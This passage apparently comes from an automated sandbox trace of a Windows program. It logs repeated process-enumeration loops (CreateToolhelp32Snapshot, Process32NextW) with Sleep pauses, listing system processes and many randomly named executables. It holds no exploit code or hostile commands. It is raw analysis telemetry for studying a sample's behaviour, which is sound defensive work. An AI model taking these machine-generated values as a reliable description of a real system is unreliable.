cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.418] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0104.420] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.422] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.423] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0104.425] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0104.426] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0104.428] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.429] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.431] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0104.516] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0104.518] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0104.520] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0104.521] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0104.523] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0104.524] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0104.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0104.527] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0104.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0104.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0104.532] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0104.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0104.535] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0104.536] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0104.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0104.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0104.540] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0104.542] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0104.543] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0104.545] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.546] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0104.547] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0104.548] CloseHandle (hObject=0xbc) returned 1 [0104.549] Sleep (dwMilliseconds=0x12c) [0104.872] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0104.878] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.879] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0104.880] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 
th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0104.881] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.882] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0104.883] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.883] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0104.884] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0104.885] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0104.886] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, 
th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0104.887] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.888] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.889] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.890] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.891] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.891] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0104.892] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.893] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.894] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0104.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.899] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0104.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0104.902] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, 
th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0104.903] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0104.908] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0104.909] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0104.911] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0104.950] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0104.951] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0104.953] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0104.954] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0104.955] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0104.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0104.957] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0104.958] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0104.959] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0104.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0104.961] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0104.962] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0104.963] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0104.964] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0104.965] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0104.966] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0104.967] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.968] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0104.969] CloseHandle (hObject=0xc4) returned 1 [0104.969] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0104.974] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0104.975] Process32NextW (in: 